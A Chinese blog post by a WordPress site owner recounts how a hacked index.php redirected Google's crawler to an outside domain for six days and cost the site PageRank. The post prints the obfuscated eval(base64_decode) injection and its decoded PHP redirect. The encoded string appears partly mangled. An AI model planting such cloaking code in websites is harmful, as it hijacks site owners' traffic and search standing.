这一次的情况和上次不同,上次是被修改了.htaccess文件,凡是访问的useragent包含spider, bot字样的都会被转向到某一个网站。与上次.htaccess被hack不同的是,这次被修改的文件是index.php文件,因为wordpress的访问时会首先访问index.php文件,所以只要在index.php的第一行加上一个条件301转向就能达到和上次.htaccess被修改相同的目的。

可悲的是,这次由于是月底工作较忙的一段时间,也没有时间观测网站,造成了长达6天没有发现问题,现在连Pr值也降了,因为上个月末的几天正好是pr值更新的日子。

WordPress原带的.htaccess里有这一段:

<IfModule mod_rewrite.c>
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

然后index.php被修改为:

eval (base64_decode("JGFnZW50PSRfU0VSVkVSW0hUVFBfVVNFUl9BR0VOVF07aWYgKHN0cmlzdHIoJ GFnZ50LCJnb29nbGUiKSl7aGVhZGVyKCJIVFRQLzEuMSAzMDEiKTtoZWFkZ
XIoIkxvY2F0aWuOiBodHRwOi8vZG9vcm1vbmV5Lm5ldC8iKTtleGl0KCk7fQ=="));

这行解密后是:

$agent=$_SERVER[HTTP_USER_AGENT];if (stristr($agent,"google")){header("HTTP/1.1 301");header("Location: http://doormoney.net/");exit();}

我在发现网站被301转向后,在检查原代码的时候范了个错误,在检查了.htaccess没有差错之后,用了Notepad++的在文件中查找功能,搜索关键字google,当然没有找到,也没有打开index.php文件看一看。网站的访问纪录是只保留三天,也没有查到是从什么途径更改的文件,只有从网上找到一些Wordpress的安全设置来加强。